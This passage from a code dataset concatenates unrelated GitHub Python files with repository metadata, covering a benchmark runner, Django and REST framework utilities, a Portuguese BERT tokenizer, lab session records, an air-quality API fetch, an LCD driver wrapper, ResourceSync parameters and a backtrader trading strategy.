loss","repo_name":"Minglin-Chen/Capsule-Network-in-PyTorch","sub_path":"criterion/CapsNetLoss.py","file_name":"CapsNetLoss.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"44100523058","text":"#!/usr/bin/env python3\n\nfrom subprocess import Popen, PIPE, call\n\nEXECUTABLE = \"./test\"\n\nprint(r'''\n---------\\\nBuilding |\n---------/\n''')\ncall(['make','release'])\n\nprint(r'''\n---------\\\nRunning |\n---------/\n''')\n\n\nclass Result:\n    def __init__(self, name, data):\n        self._name = name\n        self._data= {k:list(map(int,v)) for k,*v in data}\n\n    def printTable(self):\n        print(self._name)\n        JUST = 10\n        labels = [\"\", \"min\", 
\"max\", \"med\", \"rel. stddev\"]\n lines = []\n lines.append([JUST*\"_\"]*len(labels))\n lines.append(labels)\n for k,v in self._data.items():\n lines.append([JUST*\"-\"]*len(labels))\n medVal = sum(v)/len(v)\n relStddev = sum(map(lambda x: (x-medVal)**2, v))**0.5 / medVal\n lines.append([k, min(v), max(v), round(medVal,1), round(relStddev,4)])\n for l in lines:\n print('|'.join(map(lambda x: str(x).rjust(JUST), l)))\n print()\n\n\n def __str__(self):\n ret = self._name + '\\n\\t'\n ret += '\\n\\t'.join(map(str,self._data.items()))\n return ret\n\np = Popen([EXECUTABLE], stdin=PIPE, stdout=PIPE, stderr=PIPE)\nout = p.communicate()[0].decode().split('\\n')\nout = list(map(lambda x: [i.strip() for i in x.split() if i.strip()], out))\nout = [o for o in out if o]\n\nprint('\\n'.join(map(str,out)))\n\nresults = []\ni = 0\nwhile i < len(out):\n name = out[i][0]\n count = int(out[i][1])\n i += 1\n data=out[i:i+count]\n i += count\n results.append(Result(name,data))\n\nprint(r'''\n------------\\\nResults rav |\n------------/\n''')\n\nprint('\\n'.join(map(str,results)))\n\nprint(r'''\n--------------\\\nResults tables|\n--------------/\n''')\n\nfor r in results:\n r.printTable()\n\n# print(r'''\n# ---------\\\n# Clearing |\n# ---------/\n# ''')\n# call(['make','clean'])\n","repo_name":"msypetkowski/x86_StringTest","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7955493468","text":"\n\nfrom lib.display import Display\nfrom lib.multiplexer import Multiplexer\nfrom lib.draw_utils import draw_centered_text, get_font, get_max_font, draw_check_mark, draw_chevron, draw_block\nimport textwrap\nimport math\nfrom display_manager import DisplayManager\n\nclass GameView:\n def __init__(self, config): \n self.config = config\n self.font, self.wrapped, self.max_len = self.get_font_and_wrapped()\n\n def draw_task(self):\n def draw_function(draw, device):\n font = get_font(22)\n draw_centered_text(device, draw, font, \"Schätze\", 2)\n draw_centered_text(device, draw, font, \"die Daten\", 30)\n\n DisplayManager.instance().main_display.draw(draw_function)\n\n def get_font_and_wrapped(self):\n # get longest label\n max_len_total = len(max([field[\"label\"]for field in self.config[\"data\"]], key=len))\n max_len_row = 0\n wrapped = []\n for i, field in enumerate(self.config[\"data\"]):\n rows = textwrap.wrap(field[\"label\"], max_len_total//2.5, break_long_words=False)\n max_len_row = max(max_len_row, len(max(rows, key=len)))\n wrapped.append(rows)\n\n return get_max_font(DisplayManager.instance().main_display.device.width, max_len_row), wrapped, max_len_row\n\n def draw_label(self, index):\n def draw_function(draw, device):\n label_rows = self.wrapped[index]\n h = draw.textsize(\"Xg\", font=self.font)[1]\n baseline = len(label_rows) * -0.5 * h\n for i, row in enumerate(label_rows):\n y = device.height / 2 + baseline + i * h \n draw_centered_text(device, draw, self.font, row, y)\n DisplayManager.instance().displays[index].draw(draw_function)\n \n def cleanup(self): \n pass \n","repo_name":"schachdavid/constructive-bar-chart","sub_path":"data-physicalization/screens/game/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72140109607","text":"from rest_framework.pagination import PageNumberPagination\nfrom collections import OrderedDict\nfrom 
rest_framework.views import Response\nclass Mypageination(PageNumberPagination):\n    page_size = 10 # default number of items per page\n    page_query_param = 'page_num' # query param selecting which page to return (default name: page)\n    page_size_query_param = 'page_size' # query param overriding the page size\n    max_page_size = 50 # maximum number of items per page\n    def get_paginated_response(self, data):\n        code = 200\n        msg = '成功'\n        if not data:\n            code = 404\n            msg = '没有发现数据'\n        return Response(OrderedDict([\n            ('code',code),\n            ('message',msg),\n            ('count', self.page.paginator.count),\n            # ('next', self.get_next_link()),\n            # ('previous', self.get_previous_link()),\n            ('data', data)\n        ]))\n","repo_name":"lrange2001/ftest","sub_path":"ftest/server/other/ftestPageNumberPagination.py","file_name":"ftestPageNumberPagination.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19840255031","text":"#!/usr/bin/env python\n__author__ = 'jesse'\n''' give this a set of np_observations\n\n    outputs synsets and observation pairing attempting to reconstruct original wnid_graph based on observations alone\n\n'''\n\nimport argparse\nimport pickle\nfrom gap_statistic_functions import *\n\n\ndef main():\n\n    # read in pre-calculated information\n    f = open(FLAGS_params_infile, 'rb')\n    clusters, means, syn_idx, syn_jdx = pickle.load(f)\n    f.close()\n\n    # do the grunt work\n    set_x = clusters[syn_idx]\n    set_x = numpy.concatenate((set_x, clusters[syn_jdx][:]), 0)\n    ref_sets = get_reference_sets(set_x)\n    ks = [1, 2]\n    mu_k1 = reevaluate_centers({0: set_x}, len(set_x[0]))\n    mu_k2 = [means[syn_idx], means[syn_jdx]]\n    clusters_k1 = {0: set_x}\n    clusters_k2 = {0: clusters[syn_idx], 1: clusters[syn_jdx]}\n    w_k1 = numpy.log(wk(mu_k1, clusters_k1))\n    w_k2 = numpy.log(wk(mu_k2, clusters_k2))\n    merge, gap, _ = gap_statistic(ks, [w_k1, w_k2], ref_sets)\n\n    # write merge value and calculated gap to pickle\n    f = open(FLAGS_outfile, 'wb')\n    d = [merge, gap]\n    pickle.dump(d, f)\n    f.close()\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--params_infile', type=str, required=True,\n                        help=\"parameters to pass to gap_statistic\")\n    parser.add_argument('--outfile', type=str, required=True,\n                        help=\"output pickled return values of gap_statistic\")\n    args = parser.parse_args()\n    for k, v in vars(args).items():\n        globals()['FLAGS_%s' % k] = v\n    main()\n","repo_name":"thomason-jesse/synpol","sub_path":"run_gap_statistic.py","file_name":"run_gap_statistic.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40727604758","text":"import fileinput\n\nnums = []\nfor line in fileinput.input():\n\tnums.append(int(line))\n\ndef solve_part1():\n\ti = 25\n\twhile i < len(nums):\n\t\tn = nums[i]\n\t\tfound = False\n\t\tfor x in range(1, 26):\n\t\t\tfor y in range(1, 26):\n\t\t\t\tif x != y and nums[i - x] + nums[i - y] == n:\n\t\t\t\t\tfound = True\n\t\t\t\t\tbreak\n\t\tif not found:\n\t\t\treturn nums[i]\n\t\ti += 1\n\t\ndef solve_part2(find):\n\ti = len(nums) - 1\n\twhile i > 0:\n\t\tk = i\n\t\tcount = 0\n\t\twhile k > 0 and count < find:\n\t\t\tcount += nums[k]\n\t\t\tk -= 1\n\t\tif k != i - 1 and count == find:\n\t\t\tweak = []\n\t\t\tk += 1\n\t\t\twhile k <= i:\n\t\t\t\tweak.append(nums[k])\n\t\t\t\tk += 1\n\t\t\tweak.sort()\n\t\t\treturn (weak[0] + weak[-1])\n\t\ti -= 1\n\npart1 = solve_part1()\nprint(part1)\npart2 = 
solve_part2(part1)\nprint(part2)\n","repo_name":"rpehkone/adventofcode","sub_path":"2020/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41416521758","text":"from django.http import HttpResponse\n\nfrom TestModel.models import Test\n\n# def testdb(request):\n#     test1 = Test(name='runoob')\n#     test1.save()\n#     return HttpResponse(\"<p>Data added successfully!</p>\")\n\n# database operations\ndef testdb(request):\n    # initialization\n    response1 = \"\"\n    response2 = \"\"\n\n    # all() on the objects model manager returns every row, like SELECT * FROM in SQL\n    list1 = Test.objects.all()\n\n    # filter() is the SQL WHERE clause: it narrows the result set by a condition\n    list2 = Test.objects.filter(id=1)\n\n    # fetch a single object\n    list3 = Test.objects.get(id=1)\n    # limit the rows returned, equivalent to OFFSET 0 LIMIT 2 in SQL\n    Test.objects.order_by('name')[0:2]\n\n    # sort the data\n    Test.objects.order_by(\"id\")\n\n    # the methods above can be chained\n    Test.objects.filter(name=\"runoob\").order_by(\"id\")\n    test1 = Test.objects.get(id=1)\n    test1.name = 'Google'\n    test1.save()\n\n    # output all the data\n    for var in list1:\n        response1 += var.name + \" \"\n    for var in list2:\n        response2 += var.name + \" \"\n    response3 = list3.name\n    return HttpResponse(\"<p>\" + response1 + \"</p>\" + '\n' +\n                        \"<p>\" + response2 + \"</p>\" + '\n' +\n                        \"<p>\" + response3 + \"</p>\" + '\n' +\n                        \"<p>\" + str(list3.__class__) + \"</p>\" + '\n' +\n                        \"<p>\" + str(type(list3)) + \"</p>\" + '\n' +\n                        \"<p>\" + test1.name + \"</p>\" + '\n'\n                        )","repo_name":"dashanthony/Django","sub_path":"Django/testdb.py","file_name":"testdb.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11624828213","text":"# -*- coding: utf-8 -*-\n\nimport spacy\nimport urllib\nimport re\nimport math\nfrom gensim.corpora import Dictionary\nimport xml.etree.ElementTree as ET\nfrom bs4 import BeautifulSoup\nimport random as rd\nimport codecs\nimport nltk.data\nfrom multiprocessing import Process, Lock\nimport copy\n\nnlp = spacy.load(\"pt_core_news_sm\")\nrd.seed(4321)\n\ndef read_xml(xml_file_location, abbreviations=None):\n    tokenizer = nltk.data.load('tokenizers/punkt/portuguese.pickle')\n    tree = ET.parse(xml_file_location)\n    root = tree.getroot()\n    soup = None\n    docs = []\n    if abbreviations is not None:\n        for item in abbreviations:\n            tokenizer._params.abbrev_types.add(item)\n\n    for paragraph in root.iter('Texto'):\n        #print(paragraph.text)\n        soup = BeautifulSoup(paragraph.text, 'html.parser')\n        for p in soup.select('p'):\n            texto = p.text.replace('\r', ' ').replace('\n', ' ').strip()\n            if len(texto) > 0:\n                doc = tokenizer.tokenize(texto.lower())\n                docs.extend(doc)\n    return docs\n\ndef read_html(file_location, abbreviations=None):\n    tokenizer = nltk.data.load('tokenizers/punkt/portuguese.pickle')\n    docs = []\n    if abbreviations is not None:\n        for item in abbreviations:\n            tokenizer._params.abbrev_types.add(item)\n\n    with codecs.open(file_location, 'r', 'utf-8') as f:\n        content = f.read()\n        soup = BeautifulSoup(content, features = 'lxml')\n        paragraphs = soup.find_all('p')\n        for p in paragraphs:\n            texto = p.text.replace(\"\r\", '').replace(\"\n\", ' ').strip().lower()\n            if len(texto) > 0:\n                doc = tokenizer.tokenize(texto)\n                docs.extend(doc)\n    return docs\n\ndef tokenizer_sentence(text, spacy_model=None, lemm_alternatives=None, exeption_lst=['ADJ', 'PROPN', 'NOUN'], insert_val_mask=True, debug=False):\n    last_viewed = None\n    text_split = re.split(r'(\W+)', text)\n    #text_split = re.sub(r'\W+', ' ', text)\n    if spacy_model is None:\n        nlp = spacy.load(\"pt_core_news_sm\")\n    else:\n        nlp = spacy_model\n    \n    model = nlp(' '.join(text_split).strip())\n    #model = nlp(text_split.strip())\n    tokens = []\n    new_tokens = []\n    count = 0\n    for word in model:\n        str_word = str(word.text).lower().strip()\n        if str_word != last_viewed:\n            if count > 0:\n                tokens += new_tokens + ['##SEQT']\n            elif last_viewed is not None:\n                tokens += new_tokens\n            \n            new_tokens = []\n            last_viewed = str_word\n            count = 0\n            \n            num = True\n            len_word = 0\n            \n            if lemm_alternatives and str_word in lemm_alternatives:\n                str_lemma = lemm_alternatives[str_word].lower()\n            else:\n                str_lemma = str(word.lemma_).lower().strip()\n            \n            try:\n                int(str_word)\n            except ValueError:\n                num = False\n\n            if num:\n                new_tokens.append('##NUM')\n                if insert_val_mask:\n                    new_tokens.append(str_word)\n                if debug:\n                    print(str_word)\n                    print(f'num: {word.pos_}')\n            elif word.pos_ == 'NUM':\n                new_tokens.append('##NUMEXT')\n                if insert_val_mask:\n                    new_tokens.append(str_word)\n                if debug:\n                    print(str_word)\n                    print(f'num: {word.pos_}')\n            elif word.pos_ in exeption_lst:\n                if debug:\n                    print(str_word)\n                    print(f'in exeption list: {word.pos_}')\n                tokens.append(str_word)\n            elif len(str_word) > 0 and str_word == str_lemma:\n                new_tokens.append(str_word)\n            else:\n                #lemma\n                i = 0\n                \n                if len(str_lemma) < len(str_word):\n                    len_word = len(str_lemma)\n                else:\n                    len_word = len(str_word)\n\n                while i < len_word and str_word[i] == str_lemma[i]:\n                    i += 1\n                #print(str_word, 
str_lemma)\n                if i == 0 and len(str_word) > 0:\n                    new_tokens.append(str_word)\n                    new_tokens.append('##' + str_lemma)\n                elif len(str_word[:i].strip()) > 0:\n                    new_tokens.append(str_word[:i].strip())\n\n                if i != 0 and len(str_word[i:].strip()) > 0:\n                    new_tokens.append('##' + str_word[i:].strip())\n\n                if debug:\n                    print(i)\n                    print(str_word)\n                    print(str_lemma[0:i], str_lemma[i:])\n                    print(word.pos_)\n        else:\n            count += 1\n    \n    return tokens + new_tokens\n\n# Lock the dictionary and make a deep copy\ndef pack_tokens(tokens, dictionary, lock, max_length=512):\n    nr_sep = math.ceil(len(tokens)/max_length)\n    max_length_sep = max_length - nr_sep\n    blks = math.ceil(len(tokens)/max_length_sep)\n    blocks = []\n    dict_copy = None\n    \n    lock.acquire()\n    try:\n        dictionary.add_documents([tokens])\n        dict_copy = copy.deepcopy(dictionary)\n    finally:\n        lock.release()\n\n    for i in range(blks):\n        # per-block token id lists, rebuilt for every block\n        dict_in = []\n        dict_out = []\n        size_res = 0\n        mask = [1] * max_length\n        offset = max_length_sep*i\n        #print(len(tokens[offset:(max_length_sep + offset)]))\n        res = [\"[CLS]\"] + tokens[offset:(max_length_sep + offset)] + [\"[SEP]\"]\n        size_res = len(res)\n        if size_res < max_length:\n            for j in range(size_res, max_length):\n                mask[j] = 0\n                res.append('[PAD]')\n        #print(len(res))\n        pos_mask, data_mask = mask_block(res, dict_copy)\n        for it in data_mask:\n            dict_in.append(dict_copy.token2id[it])\n        \n        for it in res:\n            dict_out.append(dict_copy.token2id[it])\n        \n        blocks.append((size_res, pos_mask, data_mask, res, dict_in, dict_out, mask))\n    return blocks\n\ndef mask_block(block, dictionary=None):\n    prob = rd.random()\n    if prob <= 0.1:\n        return -1, block\n    else:\n        mask_pos = rd.randint(1, block.index(\"[SEP]\"))\n        #print(mask_pos)\n        if block[mask_pos] not in [\"[CLS]\", \"[SEP]\", \"[PAD]\"]:\n            if prob <= 0.2:\n                if dictionary is None:\n                    mask_pos2 = rd.randint(1, block.index(\"[SEP]\")-1)\n                    if mask_pos2 != mask_pos:\n                        return mask_pos, block[0:mask_pos] + [block[mask_pos2]] + block[mask_pos+1:]\n                    else:\n                        return mask_pos, block[0:mask_pos] + [block[mask_pos2+1]] + block[mask_pos+1:]\n                else:\n                    mask_pos2 = rd.randint(4, len(dictionary)-1)\n                    if dictionary.token2id[block[mask_pos]] != mask_pos2:\n                        return mask_pos, block[0:mask_pos] + [dictionary[mask_pos2]] + block[mask_pos+1:]\n                    else:\n                        return mask_pos, block[0:mask_pos] + [dictionary[mask_pos2+1]] + block[mask_pos+1:]\n            else:\n                return mask_pos, block[0:mask_pos] + ['[MASK]'] + block[mask_pos+1:]\n    return mask_pos, block","repo_name":"gvanerven/dou_transformer","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":7366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38276960895","text":"from jaratoolbox import celldatabase\n\nsubject = 'pinp007'\nexperiments = []\n\n# rd = cellDB.Experiment('pinp007', '2015-11-18', 'nick', 'more_sounds_tuning')\nexp0 = celldatabase.Experiment(subject, '2015-11-18')\nexperiments.append(exp0)\n\n# site1 = rd.add_site(depth = 3100, tetrodes = [3, 4, 5, 6])\n\nexp0.add_site(3100, tetrodes=[3, 4, 5, 6])\nexp0.add_session('16-56-20', None, 'NoiseBurst', 'more_sounds_tuning') #Amplitude at 0.02, onset and offset responses on TT4\nexp0.add_session('16-59-10', None, 'LaserPulse', 'laser_tuning_curve') #Paradigm=laser_tuning_curve, 1mW - Responds but is then inhibited, TT4\nexp0.add_session('17-02-10', None, 'LaserTrain', 'laser_tuning_curve') #Paradigm=laser_tuning_curve, 1mW -\nexp0.add_session('17-07-37', 'a', 'AM', 'more_sounds_tuning') # Cool offset responses\n\n# site2 = 
rd.add_site(depth = 3300, tetrodes = [3, 4, 5, 6])\n\nexp0.add_site(3300, tetrodes=[3, 4, 5, 6])\nexp0.add_session('17-52-33', None, 'NoiseBurst', 'more_sounds_tuning') #Amplitude at 0.02,\nexp0.add_session('17-55-32', None, 'LaserPulse', 'laser_tuning_curve') #Paradigm=laser_tuning_curve, 1mW - Fast response and then inhibited\nexp0.add_session('17-58-23', None, 'LaserPulse', 'laser_tuning_curve') #Paradigm=laser_tuning_curve, 1mW -\nexp0.add_session('18-02-53', 'b', 'AM', 'more_sounds_tuning') #\n\n# site3 = rd.add_site(depth = 3463, tetrodes = [3, 4, 5, 6])\n\nexp0.add_site(3463, tetrodes=[3, 4, 5, 6])\nexp0.add_session('18-37-51', None, 'NoiseBurst', 'more_sounds_tuning') #Amplitude at 0.02,\nexp0.add_session('18-40-23', None, 'LaserPulse', 'more_sounds_tuning')\nexp0.add_session('18-42-33', None, 'LaserTrain', 'more_sounds_tuning')\nexp0.add_session('18-49-14', 'c', 'AM', 'more_sounds_tuning') #\n\n# site4 = rd.add_site(depth = 3582, tetrodes = [3, 4, 5, 6])\n\nexp0.add_site(3582, tetrodes=[3, 4, 5, 6])\nexp0.add_session('19-15-56', None, 'NoiseBurst', 'more_sounds_tuning') #Still mostly on and offset resp.\nexp0.add_session('19-20-01', None, 'LaserPulse', 'more_sounds_tuning')\nexp0.add_session('19-23-55', None, 'LaserTrain', 'more_sounds_tuning')\nexp0.add_session('19-28-25', 'd', 'AM', 'more_sounds_tuning')\n\nexp1 = celldatabase.Experiment(subject, '2015-12-02')\nexperiments.append(exp1)\n\n#The threshold at this site is higher, hopefully leads to better clustering for tt4\n# site2 = rd.add_site(depth = 3150, tetrodes = [4])\n\nexp1.add_site(3150, tetrodes=[4])\nexp1.add_session('14-45-15', None, 'NoiseBurst', 'am_tuning_curve') #\nexp1.add_session('14-47-43', None, 'LaserPulse', 'am_tuning_curve') # 0.2mW\nexp1.add_session('14-50-11', None, 'LaserPulse2', 'am_tuning_curve') # 1mW\nexp1.add_session('14-52-44', None, 'LaserTrain', 'am_tuning_curve') # 1mW\nexp1.add_session('14-56-18', 'b', 'AM', 'am_tuning_curve') #\n\n# site3 = rd.add_site(depth = 3250, tetrodes = [4])\n\nexp1.add_site(3250, tetrodes=[4])\nexp1.add_session('15-24-42', None, 'NoiseBurst', 'am_tuning_curve') #\nexp1.add_session('15-27-29', None, 'LaserPulse', 'am_tuning_curve') #1mW\nexp1.add_session('15-29-37', None, 'LaserTrain', 'am_tuning_curve') #1mW\nexp1.add_session('15-32-33', 'c', 'AM', 'am_tuning_curve') #\nexp1.add_session('15-57-23', 'd', 'TuningCurve', 'am_tuning_curve') #\n\n# site4 = rd.add_site(depth = 3431, tetrodes = [4])\n\nexp1.add_site(3431, tetrodes=[4])\nexp1.add_session('16-15-45', None, 'NoiseBurst', 'am_tuning_curve') # Thresholds at 39mV\nexp1.add_session('16-18-34', 'lpa', 'LaserPulse', 'am_tuning_curve') # 1mW\nexp1.add_session('16-21-13', 'lta', 'LaserTrain', 'am_tuning_curve') # 1mW\nexp1.add_session('16-24-14', 'e', 'AM', 'am_tuning_curve') # 1mW\nexp1.add_session('16-50-17', 'f', 'TuningCurve', 'am_tuning_curve') # 1mW\n\n# site5 = rd.add_site(depth = 3554, tetrodes = [4, 6])\n\nexp1.add_site(3554, tetrodes=[4, 6])\nexp1.add_session('17-03-37', None, 'NoiseBurst', 'am_tuning_curve') # Thresholds at 42mV\nexp1.add_session('17-05-59', None, 'LaserPulse', 'am_tuning_curve') # 1mW\nexp1.add_session('17-08-15', None, 'LaserTrain', 'am_tuning_curve') # 1mW\nexp1.add_session('17-11-32', 'g', 'AM', 'am_tuning_curve') # 1mW\nexp1.add_session('17-37-55', 'h', 'TuningCurve', 'am_tuning_curve') # 
1mW\n\n","repo_name":"sjara/jaratest","sub_path":"nick/inforecordings/thalamus/pinp007_inforec.py","file_name":"pinp007_inforec.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70416287527","text":"import requests\nimport csv\nimport os\n\n# set API key from OpenAQ as your env variable\nenv_var = os.getenv(\"API_VAR\")\nAPI_KEY = env_var\napi_call=\"https://api.openaq.org/v2/measurements?location_id=6386¶meter=o3¶meter=so2¶meter=no2¶meter=pm25¶meter=pm10&date_from=2023-07-01T02:00:00+02:00&date_to=2023-07-31T02:00:00+02:00&limit=3\"\n\nres = requests.get(api_call, headers={\"X-API-Key\": API_KEY})\nresults = res.json()['results']\n\nwith open(\"csv/wokalna.csv\", \"w\") as f:\n w = csv.DictWriter(f, results[0].keys())\n w.writeheader()\n w.writerows(results)","repo_name":"korpog/airq","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42822248571","text":"import threading\nimport math\n\nfrom . import driver\n\n\nNUM_COLUMNS = 20\n\nLOGIN_MESSAGE = 'Please login with your university card'\nGREATING_MESSAGE = '\\n Welcome,\\n{}\\n'\n\n\nclass LcdManager:\n lcd_lock = threading.Lock()\n lcd_handle = None\n\n @staticmethod\n def _lcd_init():\n LcdManager.lcd_handle = driver.lcd()\n\n @staticmethod\n def display_login_message():\n LcdManager.write_autojump(LOGIN_MESSAGE, 2)\n \n @staticmethod\n def display_student_greating(name, surname):\n id_string = name if len(name) + len(surname) + 1 > NUM_COLUMNS else f'{name} {surname}'\n LcdManager.write_multiline(GREATING_MESSAGE.format(_center(id_string)))\n\n @staticmethod\n def write_autojump(string, start=1):\n words = string.split(' ')\n \n lines = [''] * (start - 1)\n while words:\n line_words = list()\n acc_len = 0\n while words:\n if acc_len + len(words[0]) <= NUM_COLUMNS:\n acc_len += len(words[0]) + 1\n line_words.append(words.pop(0))\n else:\n break\n lines.append(_center(' '.join(line_words)))\n if len(lines) >= 4:\n break\n \n LcdManager.write_multiline('\\n'.join(lines))\n\n \n\n @staticmethod\n def write_multiline(string):\n with LcdManager.lcd_lock:\n if LcdManager.lcd_handle is None:\n LcdManager._lcd_init()\n LcdManager.lcd_handle.lcd_clear()\n for index, line in enumerate(string.split('\\n')):\n LcdManager.lcd_handle.lcd_display_string(line, index + 1)\n\n\ndef _center(string):\n padding_len = NUM_COLUMNS - len(string)\n string_len = padding_len // 2 + len(string)\n return string.rjust(string_len)","repo_name":"musergi/pbe_2019","sub_path":"client/lcd/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34557169668","text":"import os.path\nfrom pathlib import Path\nfrom transformers import BertTokenizerFast, BertForMultipleChoice, BertForQuestionAnswering, BertModel, \\\n AutoModelForQuestionAnswering\n\nsave_dir = Path('model')\nmodel_names = ['hfl/chinese-roberta-wwm-ext', 'hfl/chinese-macbert-base', 'hfl/chinese-macbert-large',\n 'hfl/chinese-xlnet-base', 'Langboat/mengzi-bert-base', 'ckiplab/bert-base-chinese']\nmodel_tasks = [BertModel, BertModel, BertModel, AutoModelForQuestionAnswering, BertModel, BertModel]\n\nfor model_name, model_task in zip(model_names, model_tasks):\n model_dir = save_dir / os.path.split(model_name)[-1]\n 
model_dir.mkdir(exist_ok=True, parents=True)\n\n tokenizer = BertTokenizerFast.from_pretrained(model_name)\n model = model_task.from_pretrained(model_name)\n tokenizer.save_pretrained(model_dir)\n model.save_pretrained(model_dir)","repo_name":"RobertChienShiba/2022-Fall-ADL","sub_path":"HW2/preprocess_model.py","file_name":"preprocess_model.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9347068020","text":"import os\nimport urllib.parse\nfrom pathlib import Path\n\nimport validators\nimport yaml\nfrom rspub.core.rs_paras import RsParameters, WELL_KNOWN_URL\nfrom rspub.util import defaults\n\n\nclass ElasticRsParameters(RsParameters):\n def __init__(self, **kwargs):\n super(ElasticRsParameters, self).__init__(**kwargs)\n self.resource_set = kwargs['resource_set']\n self.res_root_dir = kwargs['res_root_dir']\n self.elastic_host = kwargs['elastic_host']\n self.elastic_port = kwargs['elastic_port']\n self.elastic_index = kwargs['elastic_index']\n self.elastic_resource_doc_type = kwargs['elastic_resource_doc_type']\n self.elastic_change_doc_type = kwargs['elastic_change_doc_type']\n self.tmp_dir = kwargs.get('tmp_dir')\n\n # def abs_metadata_dir(self) -> str:\n # \"\"\"\n # ``derived`` :samp:`The absolute path to metadata directory`\n # :return: absolute path to metadata directory\n # \"\"\"\n # return self.metadata_dir\n #\n # @property\n # def metadata_dir(self):\n # return self._metadata_dir\n #\n # @metadata_dir.setter\n # def metadata_dir(self, path):\n # if not os.path.isabs(path):\n # path = os.path.join(self.resource_dir, path)\n #\n # self._metadata_dir = path\n\n def abs_tmp_dir(self) -> str:\n parent = str(Path(self.abs_metadata_dir()).parent)\n return os.path.join(parent, self.tmp_dir)\n\n @property\n def url_prefix(self):\n return self._url_prefix\n\n def description_url(self):\n \"\"\"\n ``derived`` :samp:`The current description url`\n\n The current description url either points to ``{server root}/.well-known/resourcesync``\n or to a file in the metadata directory.\n\n :return: current description url\n\n See also: :func:`has_wellknown_at_root`\n \"\"\"\n if self.has_wellknown_at_root:\n # r = urllib.parse.urlsplit(self.url_prefix)\n # return urllib.parse.urlunsplit([r[0], r[1], WELL_KNOWN_URL, \"\", \"\"])\n return urllib.parse.urljoin(self.url_prefix, WELL_KNOWN_URL)\n else:\n path = self.abs_metadata_path(WELL_KNOWN_URL)\n rel_path = os.path.relpath(path, self.resource_dir)\n return self.url_prefix + defaults.sanitize_url_path(rel_path)\n\n @url_prefix.setter\n def url_prefix(self, value):\n if value.endswith(\"/\"):\n value = value[:-1]\n parts = urllib.parse.urlparse(value)\n if parts[0] not in [\"http\", \"https\"]: # scheme\n raise ValueError(\"URL schemes allowed are 'http' or 'https'. Given: '%s'\" % value)\n is_valid_domain = validators.domain(parts.hostname) # hostname\n\n if parts.port is None:\n is_valid_port = True\n\n else:\n is_valid_port = is_int(parts.port)\n\n if not is_valid_domain:\n raise ValueError(\"URL has invalid domain name: '%s'. Given: '%s'\" % (parts.hostname, value))\n if not is_valid_port:\n raise ValueError(\"URL has invalid port: '%s'. Given: '%s'\" % (parts.port, value))\n if parts[4] != \"\": # query\n raise ValueError(\"URL should not have a query string. Given: '%s'\" % value)\n if parts[5] != \"\": # fragment\n raise ValueError(\"URL should not have a fragment. 
Given: '%s'\" % value)\n is_valid_url = validators.url(value)\n if not is_valid_url:\n raise ValueError(\"URL is invalid. Given: '%s'\" % value)\n if not value.endswith(\"/\"):\n value += \"/\"\n self._url_prefix = value\n\n @staticmethod\n def from_yaml_params(config_file):\n\n f = open(config_file, 'r+')\n config = yaml.load(f)['executor']\n\n if not os.path.exists(config['description_dir']):\n os.makedirs(config['description_dir'])\n\n rs_params = ElasticRsParameters(**config)\n return rs_params\n\n\ndef is_int(s):\n try:\n int(s)\n return True\n except ValueError:\n return False\n","repo_name":"openminted/omtd-rspub-elastic","sub_path":"omtdrspub/elastic/elastic_rs_paras.py","file_name":"elastic_rs_paras.py","file_ext":"py","file_size_in_byte":4009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1784867393","text":"import backtrader as bt\nimport pandas as pd\nfrom datetime import datetime\n\n\n# Create a Stratey\nclass TestStrategy(bt.Strategy):\n params = (('maperiod', 20), ('printlog', False))\n\n def log(self, txt, dt=None, doprint=False):\n ''' Logging function fot this strategy'''\n if self.params.printlog or doprint:\n dt = dt or self.datas[0].datetime.date(0)\n print('%s, %s' % (dt.isoformat(), txt))\n\n def __init__(self):\n # Keep a reference to the \"close\" line in the data[0] dataseries\n self.dataclose = self.datas[0].close\n\n # To keep track of pending orders and buy price/commission\n self.order = None\n self.buyprice = None\n self.buycomm = None\n\n # Add a MovingAverageSimple indicator\n self.sma = bt.indicators.SimpleMovingAverage(self.datas[0], period=self.params.maperiod)\n\n def notify_order(self, order):\n if order.status in [order.Submitted, order.Accepted]:\n # Buy/Sell order submitted/accepted to/by broker - Nothing to do\n return\n\n # Check if an order has been completed\n # Attention: broker could reject order if not enough cash\n if order.status in [order.Completed]:\n if order.isbuy():\n self.log('BUY EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f' % (order.executed.price, order.executed.value, order.executed.comm))\n\n self.buyprice = order.executed.price\n self.buycomm = order.executed.comm\n else: # Sell\n self.log('SELL EXECUTED, Price: %.2f, Cost: %.2f, Comm 